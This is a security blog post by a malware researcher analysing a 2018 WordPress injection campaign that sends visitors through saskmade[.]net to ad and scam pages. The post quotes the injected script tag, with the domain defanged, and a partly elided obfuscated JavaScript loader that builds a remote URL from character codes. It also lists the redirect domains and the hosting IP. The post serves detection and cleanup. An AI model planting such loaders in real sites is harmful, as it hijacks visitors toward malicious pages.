• Skip to primary navigation
  • Skip to content
  • Skip to primary sidebar
  • Skip to footer

Sucuri Blog

Website Security News

  • Products
    • Website Security Platform
    • Website Firewall (WAF)
    • Enterprise Website Security
    • Multisite Solutions
  • Features
    • Detection
    • Protection
    • Performance
    • Response
    • Backups
  • Partners
    • Agency Solutions
    • Partners
    • Referral Program
    • Ecommerce
  • Resources
    • Guides
    • Webinars
    • Infographics
    • SiteCheck
    • Reports
    • Email Courses
  • Immediate Help
  • Login
Saskmade Redirects

Saskmade[.]net Redirects

October 26, 2018Denis SinegubkoPortugues

FacebookTwitterSubscribe

Earlier this week, we published a blog post about an ongoing massive malware campaign describing multiple infection vectors that it uses. This same week, we started detecting new modifications of the scripts injected by this attack.

The general idea of the malware is the same, but the domain name and obfuscation has changed slightly.

For example, in the wp_post table they now inject this script:

<script src='hxxps://saskmade[.]net/head.js?ver=2.0.0' type='text/javascript'></script>

In the <head> section of HTML and PHP files, and at the top of jQuery-related JavaScript files, they inject this new obfuscated script:

var _0x1e35=['length','fromCharCode','createElement','type','async','code121','src','appendChild','getElementsByTagName','script'];(function(_0x546a53,
...skipped...
;return _0x2b7638;};var url=String[_0x5a05('0x0')](0x68,0x74,0x74, 0x70,0x73,0x3a,0x2f,0x2f,0x73,0x61,0x73,0x6b,0x6d,0x61,...skipped...,0x72,0x3d,0x31,0x2e,0x30,0x2e,0x30);
...skipped...
{if(scrpts[i]['id']==_0x5a05('0x4')){n=![];}};if(n==!![]){a();}

Basically, it’s the same “eval(String.fromCharCode(...” obfuscation with an additional layer that encodes function names and uses character codes in hexadecimal notation (e.g. 0x68 instead of 104).

This script also uses the same domain name, which loads code from “hxxps://saskmade[.]net/head.js?ver=1.0.0”.

The saskmade[.]net/head.js script sets the simpleCookie for 8 hours (to prevent recurring redirects), and redirects to “hxxp://chitax[.]space/?h=430584011_b78fa2f3fda_10000000&h_5=sub_id_2&h_2=def_sub”, which works as a traffic directing system that decides where to redirect the user further.

Currently, the redirect chain ends on some page (e.g. hxxps://bnewsb[.]com/) with aggregated ads posing as “news”.

Landing Page Ads Redirects
Landing page with ads posing as news.

Given the legacy of this campaign, it wouldn’t be surprising if under certain conditions the landing page is more malicious—for example, a tech support scam.

The saskmade[.]net domain was registered just a week ago on Oct 19, 2018, specifically for this campaign. It is currently hosted on a server with the IP 185 .212 .131 .162.

Conclusion

For site cleanup and hardening, please check our previous post which describes the most common security holes used by this attack. You can also refer to our cleanup guide for hacked WordPress sites.

If you don’t have the time or expertise to deal with this problem, you might want to check out our malware removal service.

FacebookTwitterSubscribe

Categories: WordPress SecurityTags: Balada Injector, Black Hat Tactics, Hacked Websites, Redirects

About Denis Sinegubko

Denis Sinegubko is Sucuri’s Senior Malware Researcher who joined the company in 2013. Denis' main responsibilities include researching emerging threats and creating signatures for SiteCheck. The founder of UnmaskParasites, his professional experience covers over 20 years of programming and information security. When Denis isn’t analyzing malware, you might not find him online at all. Connect with him on Twitter.

Reader Interactions

Primary Sidebar

Socialize With Sucuri

We're actively engaged across multiple platforms. Follow us and let's connect!

  • Facebook
  • Twitter
  • LinkedIn
  • YouTube
  • Instagram
  • RSS Feed

Join Over 20,000 Subscribers!

Sucuri Sidebar Malware Removal to Signup Page

Footer

Products

  • Website Firewall
  • Website AntiVirus
  • Website Backups
  • WordPress Security
  • Enterprise Services

Solutions

  • DDos Protection
  • Malware Detection
  • Malware Removal
  • Malware Prevention
  • Blacklist Removal

Support

  • Blog
  • Knowledge Base
  • SiteCheck
  • Research Labs
  • FAQ

Company

  • About
  • Media
  • Events
  • Employment
  • Contact
  • Testimonials
  • Facebook
  • Twitter
  • LinkedIn
  • Instagram

Customer Login

Sucuri Home

  • Terms of Use
  • Privacy Policy
  • Frequently Asked Questions

© 2023 Sucuri Inc. All rights reserved

Sucuri Cookie Policy
See our policy>>

Our website uses cookies, which help us to improve our site and enables us to deliver the best possible service and customer experience.